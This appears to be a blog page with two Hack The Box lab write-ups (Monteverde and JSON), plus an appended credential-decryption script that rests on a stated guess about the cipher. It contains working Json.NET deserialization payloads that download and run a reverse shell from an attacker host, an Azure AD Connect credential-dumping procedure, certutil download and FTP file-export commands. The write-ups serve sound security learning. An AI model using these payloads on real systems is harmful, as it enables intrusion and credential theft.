htb-monteverde-nl

As always we start with an nmap scan

# Nmap 7.80 scan initiated Mon Jan 13 07:39:41 2020 as: nmap -A -oN fullscan-A 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.081s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings: 
| DNSVersionBindReqTCP: 
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-13 12:50:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/13%Time=5E1C651E%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 10m42s
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2020-01-13T12:53:03
|_ start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 104.46 ms 10.10.16.1
2 104.61 ms 10.10.10.172

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 13 07:44:56 2020 -- 1 IP address (1 host up) scanned in 315.99 seconds

I enumerated the directory with an anonymous LDAP bind (-x, no credentials), which returns the full list of users and groups:

root@kali:~/htb/monteverde# ldapsearch -h 10.10.10.172 -p 389 -x -b "dc=MEGABANK,dc=LOCAL" > ldaplogall.txt

The dump also contains the following group, which becomes important for the privilege escalation:
# Azure Admins, Groups, MEGABANK.LOCAL
dn: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: Azure Admins
member: CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
member: CN=AAD_987d7f2f57d2,CN=Users,DC=MEGABANK,DC=LOCAL
member: CN=Administrator,CN=Users,DC=MEGABANK,DC=LOCAL
distinguishedName: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103001011.0Z
whenChanged: 20200103001032.0Z
uSNCreated: 36889
uSNChanged: 36897
name: Azure Admins
objectGUID:: iCAImwQrNUW6YeEQTXxy+w==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UKQoAAA==
sAMAccountName: Azure Admins
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 20200103123551.0Z
dSCorePropagationData: 16010101000001.0Z

One of the accounts from the LDAP dump, SABatchJobs, uses its own name as its password. Logging in to SMB as SABatchJobs:SABatchJobs, I find an XML file in mhope's home directory:
root@kali:~/htb/monteverde# smbmap -u SABatchJobs -p SABatchJobs -d MEGABANK -H 10.10.10.172
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.172...
[+] IP: 10.10.10.172:445 Name: MEGABANK.local 
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
azure_uploads READ ONLY
C$ NO ACCESS
E$ NO ACCESS
IPC$ READ ONLY
NETLOGON READ ONLY
SYSVOL READ ONLY
users$ READ ONLY
root@kali:~/htb/monteverde# smbclient //10.10.10.172/users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password: SABatchJobs
Try "help" to get a list of possible commands.
smb: \> ls
.        D 0 Fri Jan 3 08:12:48 2020
..       D 0 Fri Jan 3 08:12:48 2020
dgalanos D 0 Fri Jan 3 08:12:30 2020
mhope    D 0 Fri Jan 3 08:41:18 2020
roleary  D 0 Fri Jan 3 08:10:30 2020
smorgan  D 0 Fri Jan 3 08:10:24 2020

524031 blocks of size 4096. 519955 blocks available
smb: \> cd mhope
smb: \mhope\> dir
.       D 0 Fri Jan 3 08:41:18 2020
..      D 0 Fri Jan 3 08:41:18 2020
azure.xml AR 1212 Fri Jan 3 08:40:23 2020

524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (6.0 KiloBytes/sec) (average 6.0 KiloBytes/sec)
smb: \mhope\>
root@kali:~/htb/monteverde# cat azure.xml 
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>

Because the file was in mhope's user directory, a reasonable guess is that this is also his domain password, and it is: mhope:4n0therD4y@n0th3r$. (The file is a PowerShell Export-Clixml dump of an Azure AD PSADPasswordCredential object, so the secret was written to disk in clear text.)

With evil-winrm you can connect to the box as mhope and read the user flag:

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u mhope -p '4n0therD4y@n0th3r$'

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> cd ..
*Evil-WinRM* PS C:\Users\mhope> cd Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> type user.txt
4961976bd7d8f4eeb2ce3705e2f212f2

Getting root

If you look at the group memberships of this user, you can see that he is a member of the Azure Admins group.

That matters because this host runs Azure AD Connect (the AAD_987d7f2f57d2 account in the same group is the service account it creates). Azure AD Connect stores the credentials of the on-premises account it uses to synchronise with Active Directory, encrypted, in its local ADSync SQL database. A member of Azure Admins can read that database, and the encryption keys can be loaded on the box through the same key-management DLL (mcrypt.dll) the service itself uses, so the stored credentials can be decrypted. That sync account normally holds directory replication rights (it can DCSync the domain); on this box it turns out to be the domain Administrator itself.

Running the attack is as easy as downloading this PS1 script, which automates the database query and the decryption:

https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1

The technique is described in detail here: https://blog.xpnsec.com/azuread-connect-for-redteam/

Next we execute:

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u mhope -p '4n0therD4y@n0th3r$'

*Evil-WinRM* PS C:\Users\mhope\Documents> upload /root/htb/monteverde/Azure-ADConnect.ps1 c:\windows\system32\spool\drivers\color\shellcode.xml
Info: Uploading /root/htb/monteverde/Azure-ADConnect.ps1 to c:\windows\system32\spool\drivers\color\shellcode.xml

Data: 3016 bytes of 3016 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> ren shellcode.xml Azure-ADConnect.ps1
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> ./Azure-ADConnect.ps1
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> Import-Module ./Azure-ADConnect.ps1 
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> Azure-ADConnect -server 127.0.0.1 -db ADSync
[+] Domain: MEGABANK.LOCAL
[+] Username: administrator
[+]Password: d0m@in4dminyeah!

With the Administrator password you can log in via WinRM and read the root flag:

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u administrator -p 'd0m@in4dminyeah!'

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> 
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
12909612d25c8dcf6e5a07d1a804a0bc

Two earlier attempts that failed are kept below for reference. First, pulling the script from an Impacket SMB share: the box refuses because impacket-smbserver speaks SMB1 by default (start it with -smb2support to fix that):

root@kali:~/htb/monteverde# impacket-smbserver share ./
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
C:\windows\system32\spool\drivers\color>copy \\10.10.16.70\share\Azure-ADConnect.ps1 C:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1
copy \\10.10.16.70\share\Azure-ADConnect.ps1 C:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1
You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
Second, from a plain reverse shell, fetching the .ps1 with certutil and running it in PowerShell: the script is flagged by the antivirus. That is why the working run above uploads it over WinRM under an .xml name and renames it on the host:

root@kali:~/htb# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.16.70] from (UNKNOWN) [10.10.10.172] 61971
Microsoft Windows [Version 10.0.17763.914]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\windows\system32\spool\drivers\color>whoami /all
whoami /all

USER INFORMATION
----------------

User Name SID 
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601

--snip--

C:\windows\system32\spool\drivers\color>powershell -nop -Exec Bypass
certutil -urlcache -split -f http://10.10.16.70/Azure-ADConnect.ps1 c:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1
  This script contains malicious content and has been blocked by your antivirus software.

Author : Puckiestyle

htb-json-nl

As always, first an nmap scan

root@kali:~/htb/json# nmap -sV 10.10.10.158
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-13 03:59 EST
Nmap scan report for 10.10.10.158
Host is up (0.077s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd
80/tcp open http Microsoft IIS httpd 8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.63 seconds

Initial analysis of the FTP, SMB and RPC ports turned out not to be very helpful, so I moved on to the web application.

The web page showed a login screen, but a simple guess of admin:admin as username/password let me in.

After going through all requests in Burp Suite, the request to /api/Account stood out: the box is called JSON and this is the only request with a JSON response. Looking closer I noticed it carried an OAuth2 cookie and a "Bearer" header with the same value, so I concentrated on those with curl.

c:\PENTEST> curl -XGET http://10.10.10.158/api/Account
{"Message":"Authorization has been denied for this request."}
c:\PENTEST> curl -XGET http://10.10.10.158/api/Account --header "Cookie: OAuth2=eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=" --header "Bearer: eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0="
{"Id":1,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3","Name":"User Admin HTB","Rol":"Administrator"}

If I repeat the request with curl, I get back a JSON object with an Id, the username, a password hash and a few other fields. So let's take a closer look at that Bearer string.

root@kali:~/htb/json# echo -n eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0= | base64 -d
{"Id":1,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3","Name":"User Admin HTB","Rol":"Administrator"}

So the Bearer value is nothing more than the base64 of exactly the JSON that comes back: there is no signature, and the client controls every field in it. What happens if I change the Id value from an integer to a string?

root@kali:~/htb/json# echo -n {"Id":a,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3","Name":"User Admin HTB","Rol":"Administrator"} | base64 |tr -d '\n'; echo
SWQ6YSBVc2VyTmFtZTphZG1pbiBQYXNzd29yZDoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMyBOYW1lOlVzZXIgQWRtaW4gSFRCIFJvbDpBZG1pbmlzdHJhdG9y

A caveat on that command: the JSON is not quoted, so bash applies brace expansion and strips the quotes and commas before echo ever sees it. The base64 above actually decodes to Id:a UserName:admin Password:21232f297a57a5a743894a0e4a801fc3 Name:User Admin HTB Rol:Administrator, which is not JSON at all. That is still enough to trigger the error below, but to send a real JSON test case the argument has to be wrapped in single quotes.

root@kali:~/htb/json# curl -XGET http://10.10.10.158/api/Account --header "Cookie: OAuth2=eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=" --header "Bearer: SWQ6YSBVc2VyTmFtZTphZG1pbiBQYXNzd29yZDoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMyBOYW1lOlVzZXIgQWRtaW4gSFRCIFJvbDpBZG1pbmlzdHJhdG9y"
{"Message":"An error has occurred.","ExceptionMessage":"Cannot deserialize Json.Net Object","ExceptionType":"System.Exception","StackTrace":null}

So it fails with "Cannot deserialize Json.Net Object": the server hands the Bearer value to Json.NET (Newtonsoft.Json). After some searching I came across the Black Hat 2017 paper "Friday the 13th: JSON Attacks" (Muñoz and Mirosh), which states that this is not a JSON vulnerability but a deserialization vulnerability, and which lists Json.NET among the affected libraries. The mechanism: when the serializer is configured with TypeNameHandling enabled, the attacker controls the "$type" property and therefore which .NET class gets instantiated, and certain classes (gadgets) execute code while their properties are being set. To have something to run, I started a python web server hosting a nishang PowerShell reverse shell, as IppSec shows in several videos.

root@kali:~/JSON# cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 puckieshell443.ps1
root@kali:~/JSON# echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.70 -Port 443" >> puckieshell443.ps1
root@kali:~/JSON# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

(The appended line actually calls the function; the nishang script on its own only defines it.)

With that in place I started building the Json.NET payloads, following the Breeze demo from the Black Hat talk.

Below is the RCE proof of concept: the gadget chain generated by ysoserial.net, sent through Burp, and confirmed by watching for the ping in tcpdump.

c:\PENTEST\ysoserial> ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "ping 10.10.16.70" -t
{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd', '/c ping 10.10.16.70']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}
c:\PENTEST\ysoserial>

While I was messing around with this stuff, I got tired of having to encode the payloads base64 and then resend it, so I decided to create a simple python script to do that for me.

root@kali:~/htb/json# cat htb-json.py
#!/usr/bin/env python3
from base64 import b64encode
import argparse
import requests

parser = argparse.ArgumentParser(description='pass the attack script.')
parser.add_argument("-s", '--script', required=True,
                    help='script to process for the attack')
args = parser.parse_args()

# Valid admin token: goes in the cookie so the request passes the auth check
admin_token = "eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0="

# Base64 encode the provided payload file
def create_payload(package):
    with open(package, 'rb') as f:
        return b64encode(f.read()).decode('UTF-8')

# Send the payload file in the Bearer header, which is what gets deserialized
print("Sending payload:", args.script)
r = requests.get('http://10.10.10.158/api/Account',
                 headers={
                     'Cookie': 'OAuth2=' + admin_token,
                     'Bearer': create_payload(args.script)
                 })
print(r.status_code, r.text)

After quite a bit of fiddling I got the first payload working: it starts PowerShell on the server to download the modified reverse shell.

root@kali:~/htb/json# cat getPS1.plain 
{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd','/c powershell Invoke-WebRequest -Uri "http://10.10.16.70:8000/puckieshell443.ps1" -OutFile "c:\\windows\\temp\\sedje.ps1"']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}
root@kali:~/htb/json# python3 htb-json.py -s getPS1.plain
Sending payload:  getPS1.plain

And in the python web server's output I see the incoming GET request from the JSON box for puckieshell443.ps1.

root@kali:~/htb# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.158 - - [13/Jan/2020 03:04:51] "GET /puckieshell443.ps1 HTTP/1.1" 200 -

The next step is a second payload that runs the downloaded script; after some more fiddling I ended up with the following:

root@kali:~/htb/json# cat execPS1.plain
{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd','/c powershell c:\\windows\\temp\\sedje.ps1']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}

And in the terminal where the netcat listener has been waiting, I see:

root@kali:~/htb# rlwrap nc -nvvp 443
listening on [any] 443 ...
connect to [10.10.16.70] from (UNKNOWN) [10.10.10.158] 49275
Windows PowerShell running as user JSON$ on JSON
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>

Yes, I have a shell. The next thing to do is check who I am and grab the user flag:

PS C:\windows\system32\inetsrv> whoami
json\userpool
PS C:\windows\system32\inetsrv> Get-Content c:\Users\userpool\Desktop\user.txt
34459a01f50050dc410db09bfb9f52bb

Additional note

I received feedback that the command in the payload could have been simpler. Instead of going through 'cmd' and '/c', starting powershell directly would have worked just as well:

{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['powershell','Invoke-WebRequest -Uri "http://10.10.16.70:8000/reverse.ps1" -OutFile "c:\\windows\\temp\\sedje.ps1"']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}

Privilege Escalation

After poking around and running the usual PrivEsc checks, I find an interesting file in a Sync2Ftp directory:

PS C:\Program Files\Sync2Ftp> type SyncLocation.exe.config
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
  <appSettings>
    <add key="destinationFolder" value="ftp://localhost/"/>
    <add key="sourcefolder" value="C:\inetpub\wwwroot\jsonapp\Files"/>
    <add key="user" value="4as8gqENn26uTs9srvQLyg=="/>
    <add key="minute" value="30"/>
    <add key="password" value="oQ5iORgUrswNRsJKH9VaCw=="></add>
    <add key="SecurityKey" value="_5TL#+GWWFv6pfT3!GXw7D86pkRRTv+$$tk^cL5hdU%"/>
  </appSettings>
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
  </startup>


</configuration>

The file contains a username and a password that look like base64 strings, plus a SecurityKey stored in clear text right next to them. Decoding the base64 only gave unreadable bytes, so the values are encrypted rather than merely encoded, and whatever decrypts them presumably uses that key; keeping the key in the same file reduces the "encryption" to obfuscation for anyone who can read it. I ran SyncLocation.exe and it ran without any issue. Since the .exe most likely reads this .config file, I copied both files to a writable folder so I could transfer them off the box for further analysis.

C:\Program Files\Sync2Ftp> mkdir c:\windows\temp\sedje
                                          
                                          
    Directory: C:\windows\temp            
                                          
                                          
Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         10/5/2019   9:08 PM            sedje
                                                  
                                                  
PS C:\Program Files\Sync2Ftp> cd c:\windows\temp\sedje
PS C:\windows\temp\sedje> copy "C:\Program Files\Sync2Ftp\SyncLocation.exe" .
PS C:\windows\temp\sedje> copy "C:\Program Files\Sync2Ftp\SyncLocation.exe.config" .

Now that those files are ready, I have to start a local FTP server to catch the files. Python can easily do this using the pyftpdlib library.

root@kalivm:~/JSON# python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 2019-10-05 21:15:22] >>> starting FTP server on 0.0.0.0:21, pid=10105 <<<
[I 2019-10-05 21:15:22] concurrency model: async
[I 2019-10-05 21:15:22] masquerade (NAT) address: None
[I 2019-10-05 21:15:22] passive ports: None

In the Windows box, I create an ftp script and transfer the files to my local computer.

PS C:\windows\temp\sedje> dir
    Directory: C:\windows\temp\sedje
Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-ar--         5/23/2019   2:48 PM       9728 SyncLocation.exe
-a---         5/23/2019   3:08 PM        591 SyncLocation.exe.config

PS C:\windows\temp\sedje> echo "open 10.10.16.70" > ftp
PS C:\windows\temp\sedje> echo "anonymous" >> ftp
PS C:\windows\temp\sedje> echo "" >> ftp
PS C:\windows\temp\sedje> echo "put SyncLocation.exe" >> ftp
PS C:\windows\temp\sedje> echo "put SyncLocation.exe.config" >> ftp
PS C:\windows\temp\sedje> echo "quit" >> ftp
PS C:\windows\temp\sedje> ftp -s:ftp
ftp> open 10.10.16.70
Connected to 10.10.16.70.
220 pyftpdlib 1.5.4 ready.
User (10.10.16.70:(none)): 
331 Username ok, send password.

230 Login successful.
ftp> put SyncLocation.exe
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
ftp: 9728 bytes sent in 0.16Seconds 62.36Kbytes/sec.
ftp> put SyncLocation.exe.config
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
ftp: 591 bytes sent in 0.01Seconds 39.40Kbytes/sec.
ftp> quit
221 Goodbye.
PS C:\windows\temp\sedje>

So the FTP script says the files are being transferred. Time to check the FTP server for the same.

root@kali:~/htb/json# python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 2020-01-13 05:33:01] >>> starting FTP server on 0.0.0.0:21, pid=3848 <<<
[I 2020-01-13 05:33:01] concurrency model: async
[I 2020-01-13 05:33:01] masquerade (NAT) address: None
[I 2020-01-13 05:33:01] passive ports: None
[I 2020-01-13 05:35:07] 10.10.10.158:49859-[] FTP session opened (connect)
[I 2020-01-13 05:35:07] 10.10.10.158:49859-[anonymous] USER 'anonymous' logged in.
[I 2020-01-13 05:35:07] 10.10.10.158:49859-[anonymous] STOR /root/htb/json/SyncLocation.exe completed=1 bytes=9728 seconds=0.28
[I 2020-01-13 05:35:08] 10.10.10.158:49859-[anonymous] STOR /root/htb/json/SyncLocation.exe.config completed=1 bytes=591 seconds=0.14
[I 2020-01-13 05:35:08] 10.10.10.158:49859-[anonymous] FTP session closed (disconnect).
^C[I 2020-01-13 05:37:28] received interrupt signal
[I 2020-01-13 05:37:28] >>> shutting down FTP server (1 active socket fds) <<<
root@kali:~/htb/json# ls
execPS1.plain htb-json nmap-json.gnmap nmap-json.xml SyncLocation.exe.config
getPS1.plain htb-json.py nmap-json.nmap SyncLocation.exe
Once transferred, I move the files to a local Windows VM, which is easier than analysing .NET on Linux, and open the .exe in dnSpy.

In the binary there is a clearly readable Decrypt() function that takes a key and a value and turns the base64 strings from the config back into plaintext. Since I'm not very good with .NET, I look for a simple solution online.

I find it in dotnetfiddle, an online tool that runs .NET code. After pasting the function, adding the SecurityKey and calling it twice with the two base64 strings, I get:
Username: superadmin
Password: funnyhtb
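As an added example (not the page's own code, and not the dotnetfiddle snippet the author used), the same recovery can be done in Python without a Windows VM. It rests on one assumption the page does not show: that SyncLocation.exe's Decrypt() is the widespread .NET pattern of TripleDES in ECB mode with PKCS7 padding and a key obtained by MD5-hashing the SecurityKey string (the config key is 43 characters, which is not a valid 3DES key length, so some derivation like this has to be involved). The config values are the ones from SyncLocation.exe.config above; 3DES comes from pycryptodome or, failing that, the cryptography package, since the standard library has no DES.

```python
"""Recover the Sync2Ftp credentials from SyncLocation.exe.config offline.

Added example, not the page's code and not the dotnetfiddle snippet the author
used. ASSUMPTION: SyncLocation.exe's Decrypt() is the widespread .NET pattern
TripleDES / ECB / PKCS7 with Key = MD5(SecurityKey); the page only says the
function takes a key and a value. Requires pycryptodome or cryptography, as
the standard library has no DES.
"""
import base64
import hashlib
import xml.etree.ElementTree as ET

# Copied from the SyncLocation.exe.config shown above (raw string: keep backslashes).
CONFIG_XML = r"""<?xml version="1.0" encoding="utf-8" ?>
<configuration>
  <appSettings>
    <add key="destinationFolder" value="ftp://localhost/"/>
    <add key="sourcefolder" value="C:\inetpub\wwwroot\jsonapp\Files"/>
    <add key="user" value="4as8gqENn26uTs9srvQLyg=="/>
    <add key="minute" value="30"/>
    <add key="password" value="oQ5iORgUrswNRsJKH9VaCw=="></add>
    <add key="SecurityKey" value="_5TL#+GWWFv6pfT3!GXw7D86pkRRTv+$$tk^cL5hdU%"/>
  </appSettings>
</configuration>
"""


def app_settings(config_xml: bytes) -> dict:
    """Collect <appSettings><add key=... value=.../> pairs from a .NET app.config."""
    root = ET.fromstring(config_xml)
    return {e.get("key"): e.get("value") for e in root.iter("add")}


def des3_ecb_decrypt(key: bytes, data: bytes) -> bytes:
    """Raw 3DES-ECB. .NET's TripleDES accepts a 16-byte (two-key) key; both
    libraries used here expand it to K1,K2,K1 the same way."""
    try:
        from Crypto.Cipher import DES3  # pycryptodome
        return DES3.new(key, DES3.MODE_ECB).decrypt(data)
    except ImportError:
        from cryptography.hazmat.primitives.ciphers import Cipher, modes
        try:  # cryptography >= 43 moved 3DES to the 'decrepit' namespace
            from cryptography.hazmat.decrepit.ciphers.algorithms import TripleDES
        except ImportError:
            from cryptography.hazmat.primitives.ciphers.algorithms import TripleDES
        dec = Cipher(TripleDES(key), modes.ECB()).decryptor()
        return dec.update(data) + dec.finalize()


def pkcs7_unpad(padded: bytes, block_size: int = 8) -> bytes:
    """Strip PKCS7 padding; a malformed pad means the key or algorithm guess is wrong."""
    n = padded[-1] if padded else 0
    if not 1 <= n <= block_size or padded[-n:] != bytes([n]) * n:
        raise ValueError("bad PKCS7 padding: wrong key or wrong cipher")
    return padded[:-n]


def dotnet_decrypt(cipher_b64: str, security_key: str) -> str:
    """Mirror of the assumed .NET Decrypt(value, useHashing=True):
    key = MD5(SecurityKey) -> 3DES-ECB decrypt -> PKCS7 unpad -> UTF-8."""
    key = hashlib.md5(security_key.encode("utf-8")).digest()  # 16 bytes
    plain = des3_ecb_decrypt(key, base64.b64decode(cipher_b64))
    return pkcs7_unpad(plain).decode("utf-8")


def recover_credentials(config_xml: bytes) -> tuple:
    """Return (user, password) decrypted with the key stored in the same file."""
    s = app_settings(config_xml)
    return (dotnet_decrypt(s["user"], s["SecurityKey"]),
            dotnet_decrypt(s["password"], s["SecurityKey"]))


if __name__ == "__main__":
    user, password = recover_credentials(CONFIG_XML.encode())
    print(f"user={user} password={password}")
```

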